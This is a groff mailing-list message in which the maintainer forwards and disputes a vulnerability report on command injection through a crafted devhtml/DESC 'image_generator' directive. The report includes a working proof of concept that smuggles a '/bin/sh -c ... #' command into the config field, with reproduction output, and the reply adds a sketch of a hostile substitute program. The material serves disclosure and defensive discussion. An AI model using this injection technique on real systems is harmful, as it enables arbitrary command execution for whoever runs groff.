At 2026-05-28T22:11:30-0500, G. Branden Robinson wrote:
> By all means, make a stronger case for the threat this suggested
> exploit poses than the reporter did.  I'm not wedded to the spooling
> feature remaining available in safer mode.  But (1) I don't want to
> pull it behind that gate lacking a _persuasive_ case to do so; and (2)
> I invite the reader to look over groff_font(5) and behold my
> improvements^W^W^W consider similar vectors that other directives
> might make possible.

It took less than two weeks for someone to follow the bread crumbs in
point (2).

I'm inclined to disregard this report, employing the same analysis as
this group applied at the end of last month:

https://lists.gnu.org/archive/html/groff/2026-05/msg00044.html
https://lists.gnu.org/archive/html/groff/2026-05/msg00049.html
https://lists.gnu.org/archive/html/groff/2026-05/msg00051.html

In short, there appears to be no point "hardening" the "print" and
"image_generator" directives such that they are restricted to names of
commands, as the report recommends:

>> **Recommended fix**: Replace the `system()` call with a direct
>> `fork()` + `execvp()` style invocation of the image generator using
>> an `argv` array.  This ensures that the image-generator path and its
>> arguments are passed as separate arguments and cannot be interpreted
>> as shell commands.

...because if an attacker can convince the victim to install a hostile
"DESC" device description file, they can just as easily convince the
victim to install a hostile shell script and make it the spooler or
image generator "program".  Consequently, the recommended fix is no fix
at all.
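
To make that concrete, here is a minimal sketch in Python rather than
groff's C++.  The file name "fake-gs" and the marker path are
hypothetical, and the argument list is only an approximation of what
pre-grohtml passes.  It imitates a caller that already avoids the shell
and hands the program an argument list, and shows that a hostile
executable still runs whatever it likes:

```python
import os
import stat
import subprocess
import tempfile

workdir = tempfile.mkdtemp()
marker = os.path.join(workdir, "marker")

# Hypothetical hostile "image generator": an ordinary executable script
# that ignores its arguments and runs a command of the attacker's choosing.
hostile_program = os.path.join(workdir, "fake-gs")
with open(hostile_program, "w") as f:
    f.write("#!/bin/sh\ntouch '%s'\n" % marker)
os.chmod(hostile_program, stat.S_IRWXU)

# What a "hardened" caller would do: treat the directive as a program
# name and pass the arguments as a list, with no shell in between.
argv = [hostile_program, "-q", "-dBATCH", "-dSAFER"]
status = subprocess.run(argv, check=False).returncode

print("exit status:", status)
print("marker created:", os.path.exists(marker))
```

No shell metacharacters are involved anywhere in that sketch; the
attacker only needs the victim to accept one more file.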

What do you guys think?  Am I making sense?

Regards,
Branden

----- Forwarded message from wheat MAX <[email protected]> -----

Date: Wed, 10 Jun 2026 13:59:40 +0800
From: wheat MAX <[email protected]>
To: [email protected]
Message-ID: <cakugowdcjxnkpcc+emx7w_x7cczncxaykwqvfow9gpkxv27...@mail.gmail.com>
Subject: [BUG] GNU groff 1.24.0: OS command injection (CWE-78) in pre-grohtml
 image_generator handling via crafted devhtml/DESC

Hello maintainers, we have discovered an injection bug in the new version of
groff.

# GNU groff 1.24.0: OS command injection (CWE-78) in pre-grohtml image_generator handling via crafted devhtml/DESC

## Summary

- **CWE**: CWE-78 (Improper Neutralization of Special Elements used in an
OS Command / OS Command Injection)
- **Vendor**: GNU Project
- **Product**: GNU groff (`pre-grohtml` / `groff -Thtml` pipeline)
- **Affected Version(s)**: GNU groff Git master commit
`967814d0057ba2bd7802c81dae2bc0e7a4f2616e` (tested as GNU groff 1.24.0)
- **Affected Component(s)**:
  - `src/preproc/html/pre-html.cpp`, `get_image_generator()` — reads the
`image_generator` directive from the `devhtml/DESC` device description
selected through the groff font/device search path.
  - `src/preproc/html/pre-html.cpp`, `imageList::createPage()` — inserts
the `image_generator` string directly into a shell command string.
  - `src/preproc/html/pre-html.cpp`, `html_system()` — executes the
constructed command string with `system()`.
- **Attack Type / Vector**: Local — via a crafted groff font/device
directory supplied with `-F`, containing a malicious `devhtml/DESC`
`image_generator` directive, when `groff -Thtml` processes input that
triggers image generation.
- **Impact**: Arbitrary command execution with the privileges of the user
running `groff -Thtml`.

This report is independent from the companion GNU groff `eqn` CWE-121
report. They affect different groff components and different attack
surfaces: this issue is command injection in the HTML preprocessing
pipeline, while the companion report is a stack-based buffer overflow in
the `eqn` parser.

---

## Technical Details / Root Cause

In GNU groff, the HTML output pipeline uses `pre-grohtml` to prepare input
for HTML formatting and to generate images for content such as equations.
`pre-grohtml` reads device-description files from the groff font/device
search path. The normal `groff -F <font-directory>` option can select an
alternate font/device directory, including an alternate `devhtml/DESC` file.

The vulnerability is in the interaction between the `image_generator`
directive in `devhtml/DESC` and shell command construction in `pre-grohtml`:

1. **Attacker-controlled device directive is read from the selected font
path**: `get_image_generator()` opens `devhtml/DESC` through
`font_path.open_file()`, then returns the text after the `image_generator`
keyword without shell escaping, validation, or restriction:
   ```cpp
   static char *get_image_generator(void)
   {
     char *pathp;
     FILE *f;
     char *generator = 0 /* nullptr */;
     const char keyword[] = "image_generator";
     const size_t keyword_len = strlen(keyword);
     f = font_path.open_file(devhtml_desc, &pathp);
     if (0 /* nullptr */ == f)
       fatal("cannot open file '%1': %2", devhtml_desc, strerror(errno));
     int lineno = 0;
     while (get_line(f, pathp, lineno++)) {
       char *cursor = linebuf;
       size_t limit = strlen(linebuf);
       char *end = linebuf + limit;
       if (0 == (strncmp(linebuf, keyword, keyword_len))) {
         cursor += keyword_len;
         // At least one space or tab is required.
         if(!(' ' == *cursor) || ('\t' == *cursor))
           continue;
         cursor++;
         while((cursor < end) && ((' ' == *cursor) || ('\t' == *cursor)))
           cursor++;
         if (cursor == end)
           continue;
         generator = cursor;
       }
       ...
     }
     free(pathp);
     fclose(f);
     return generator;
   }
   ```

2. **The directive is stored as the global image generator command**:
During startup, `main()` copies the returned string into `image_gen`:
   ```cpp
   image_gen = strsave(get_image_generator());
   if (0 /* nullptr */ == image_gen)
     fatal("'image_generator' directive not found in file '%1'",
           devhtml_desc);
   ```
   At this point, a crafted `devhtml/DESC` can make `image_gen` contain
shell syntax such as `/bin/sh -c 'touch /tmp/marker' #`.

3. **The directive is concatenated into a shell command**: When HTML output
requires image generation, `imageList::createPage()` constructs a command
string and places `image_gen` at the beginning of the command:
   ```cpp
   int imageList::createPage(int pageno)
   {
     ...
     const char *s = make_string("ps2ps -sPageList=%d %s %s",
                                 pageno, psFileName, psPageName);
     html_system(s, 1);
     assert(strlen(image_gen) > 0);
     s = make_string("echo showpage | "
                     "%s%s -q -dBATCH -dSAFER "
                     "-dDEVICEHEIGHTPOINTS=792 "
                     "-dDEVICEWIDTHPOINTS=%d -dFIXEDMEDIA=true "
                     "-sDEVICE=%s -r%d %s "
                     "-sOutputFile=%s %s -",
                     image_gen,
                     EXE_EXT,
                     (getMaxX(pageno) * image_res) / postscriptRes,
                     image_device,
                     image_res,
                     antiAlias,
                     imagePageName,
                     psPageName);
     html_system(s, 1);
     free(const_cast<char *>(s));
     ...
   }
   ```

4. **The constructed string is executed by the shell**: `html_system()`
passes the constructed command string to `system()`:
   ```cpp
   static void html_system(const char *s, int redirect_stdout)
   {
     ...
     int status = system(s);
     ...
   }
   ```
   `system()` invokes `/bin/sh -c`, so shell metacharacters and shell
syntax in `image_generator` are interpreted semantically. A trailing `#` in
the malicious directive comments out the rest of the command appended by
`pre-grohtml`.

No neutralization occurs anywhere on this path. The `image_generator` value
is selected from an attacker-controlled device-description file,
concatenated into a shell command, and executed with `system()`.
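
The four steps above can be paraphrased in a short Python sketch. This is an illustration under stated assumptions, not a translation of `pre-html.cpp`: the helper names mirror the C++ functions only loosely, the device, resolution, and file-name values are placeholders, and the injected command is a harmless `echo`.

```python
import subprocess

KEYWORD = "image_generator"

def get_image_generator(desc_text):
    """Return the text after the keyword, unvalidated, or None."""
    generator = None
    for line in desc_text.splitlines():
        if not line.startswith(KEYWORD):
            continue
        rest = line[len(KEYWORD):]
        # At least one space or tab must separate keyword and value.
        if not rest or rest[0] not in " \t":
            continue
        value = rest.lstrip(" \t")
        if value:
            generator = value
    return generator

def build_command(image_gen):
    # Same shape as the format string in createPage(); the device,
    # resolution, and file names are placeholders for illustration.
    return ("echo showpage | %s%s -q -dBATCH -dSAFER -sDEVICE=%s -r%d "
            "-sOutputFile=%s %s -"
            % (image_gen, "", "pnmraw", 100, "/dev/null", "/dev/null"))

# Hypothetical DESC content with a harmless injected command.
desc = "res 240\nimage_generator /bin/sh -c 'echo injected' #\n"
command = build_command(get_image_generator(desc))
print(command)

# shell=True hands the whole string to /bin/sh -c, as system() does.
result = subprocess.run(command, shell=True, capture_output=True, text=True)
print(result.stdout.strip())
```

On a POSIX system the second line printed should be `injected`: the shell runs the quoted command, and everything after the `#` is treated as a comment.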

---

## Reproduction (PoC)

The command injection is reproducible on the default upstream build of GNU
groff on Linux. The PoC below creates a valid alternate font/device
directory by copying the stock `devhtml` and `devps` device descriptions,
then changes only the `image_generator` directive.

```sh
cd ~/groff_master
rm -rf /tmp/groff_font_cwe78 /tmp/groff_prehtml_cwe78_master
mkdir -p /tmp/groff_font_cwe78/devhtml /tmp/groff_font_cwe78/devps

# Preserve valid device descriptions and modify only image_generator.
cp font/devhtml/DESC /tmp/groff_font_cwe78/devhtml/DESC
cp font/devps/DESC /tmp/groff_font_cwe78/devps/DESC
python3 - <<'PY'
p = '/tmp/groff_font_cwe78/devhtml/DESC'
lines = open(p).read().splitlines()
out = []
for line in lines:
    if line.startswith('image_generator'):
        out.append("image_generator /bin/sh -c 'touch /tmp/groff_prehtml_cwe78_master' #")
    else:
        out.append(line)
open(p, 'w').write('\n'.join(out) + '\n')
PY

# Use an equation to trigger HTML image generation.
cat > /tmp/eqn_image_cwe78.roff <<'R'
.EQ
a over b
.EN
R

./test-groff -F /tmp/groff_font_cwe78 -e -Thtml /tmp/eqn_image_cwe78.roff \
  >/tmp/groff_html_master.out 2>/tmp/groff_html_master.err

echo "exit=$?"
ls -l /tmp/groff_prehtml_cwe78_master
sed -n '1,8p' /tmp/groff_html_master.err
```

The PoC uses two small files/directories. The relevant modified line in
`/tmp/groff_font_cwe78/devhtml/DESC` is:

```text
image_generator /bin/sh -c 'touch /tmp/groff_prehtml_cwe78_master' #
```

The input document `/tmp/eqn_image_cwe78.roff` is intentionally minimal;
its only purpose is to trigger HTML image generation:

```roff
.EQ
a over b
.EN
```

Observed result on Ubuntu 24.04 (`gcc 13.3.0`, default `./bootstrap &&
./configure && make`), using GNU groff Git master commit
`967814d0057ba2bd7802c81dae2bc0e7a4f2616e`:

```text
GNU groff version 1.24.0
image_generator /bin/sh -c 'touch /tmp/groff_prehtml_cwe78_master' #
master exit=0
MASTER_MARKER_CREATED
-rw-rw-r-- 1 zijian zijian 0 Jun 10 00:22 /tmp/groff_prehtml_cwe78_master
pamcut: Error reading first byte of what is expected to be a Netpbm magic
number.  Most often, this means your input file is empty
pnmcrop: Error reading first byte of what is expected to be a Netpbm magic
number.  Most often, this means your input file is empty
pnmtopng: Error reading first byte of what is expected to be a Netpbm magic
number.  Most often, this means your input file is empty
pre-grohtml: command 'pamcut 115 3 9 29 < /tmp/groff-page-0AmDwB | pnmcrop
-quiet| pnmtopng -quiet -background rgb:f/f/f -transparent rgb:f/f/f>
grohtml-2210740-2.png' returned status 1
```

The marker file `/tmp/groff_prehtml_cwe78_master` is created by the command
embedded in `devhtml/DESC`. This confirms semantic command execution in the
stock compiled binary. The later `pamcut`/`pnmcrop` diagnostics occur only
because the PoC replaces the expected Ghostscript program with a
marker-file command; they are not required for command execution.

A final verification run after report formatting used a fresh marker file
and reproduced the same semantic injection:

```text
groff -F malicious -e -Thtml exit=0
MARKER_CREATED
-rw-rw-r-- 1 zijian zijian 0 Jun 10 00:29 /tmp/reverify_cwe78_marker
```

---

## Fix / Mitigation

Avoid executing a shell command constructed from a device-description
string. The `image_generator` directive should be treated as an executable
path or command name, not as shell syntax.

**Recommended fix**: Replace the `system()` call with a direct `fork()` +
`execvp()` style invocation of the image generator using an `argv` array.
This ensures that the image-generator path and its arguments are passed as
separate arguments and cannot be interpreted as shell commands.

If configurable arguments are required, parse them with a shell-free
tokenizer and pass each token as a separate `argv` element. Do not pass the
resulting string through `/bin/sh -c`.
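
As a rough illustration of the shell-free approach, the following Python sketch uses `subprocess.run()` with an argument list in place of `fork()` + `execvp()`. The function name `run_image_generator` and the marker path are hypothetical, and the directive is assumed to be treated as a single program name.

```python
import os
import subprocess
import tempfile

def run_image_generator(image_gen, args):
    """Execute image_gen as one program name with an argv list."""
    # A list argument with the default shell=False reaches exec*()
    # directly; nothing interprets quotes, pipes, or '#'.
    return subprocess.run([image_gen] + list(args), check=False).returncode

marker = os.path.join(tempfile.mkdtemp(), "marker")
hostile = "/bin/sh -c 'touch %s' #" % marker

try:
    run_image_generator(hostile, ["-q", "-dBATCH", "-dSAFER"])
    outcome = "executed"
except OSError as exc:
    # No file has this whole string as its name, so exec fails.
    outcome = "not executed: %s" % exc.__class__.__name__

print(outcome)
print("marker created:", os.path.exists(marker))
```

This only covers the case where the directive is taken as a bare program name. If the directive were instead split into tokens that honor quoting, the same string would presumably still start `/bin/sh -c` with the quoted command as its argument, so the tokenizing variant needs separate scrutiny.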

### Recommended Mitigations

- **Preferred**: Replace `system()` in the image-generation path with a
shell-free process invocation (`fork()` + `execvp()` or equivalent).
- If patching is not immediately possible:
  - Do not run `groff -Thtml` with untrusted `-F` font/device directories.
  - Do not allow untrusted users to supply `devhtml/DESC` files.
  - Pin groff's font/device path to a trusted directory and sandbox the
formatter when processing untrusted input.
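
One way a wrapper script might enforce the "trusted directory" advice is sketched below in Python. The function name `is_trusted_font_dir` and the root `/usr/share/groff` are assumptions for illustration; groff itself provides no such check, and actual installation paths vary.

```python
import os

def is_trusted_font_dir(candidate, trusted_roots):
    """True if candidate resolves to a location inside a trusted root."""
    # realpath() resolves symlinks and ".." so that a path cannot
    # escape a trusted root by indirection.
    real = os.path.realpath(candidate)
    for root in trusted_roots:
        real_root = os.path.realpath(root)
        if os.path.commonpath([real, real_root]) == real_root:
            return True
    return False

# Assumed trusted root; adjust to the local installation.
trusted = ["/usr/share/groff"]
for path in ("/usr/share/groff/1.24.0/font", "/tmp/groff_font_cwe78"):
    print(path, is_trusted_font_dir(path, trusted))
```

A wrapper would call this on each `-F` argument before invoking `groff -Thtml` and refuse to proceed when it returns false.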

Thank you.

----- End forwarded message -----
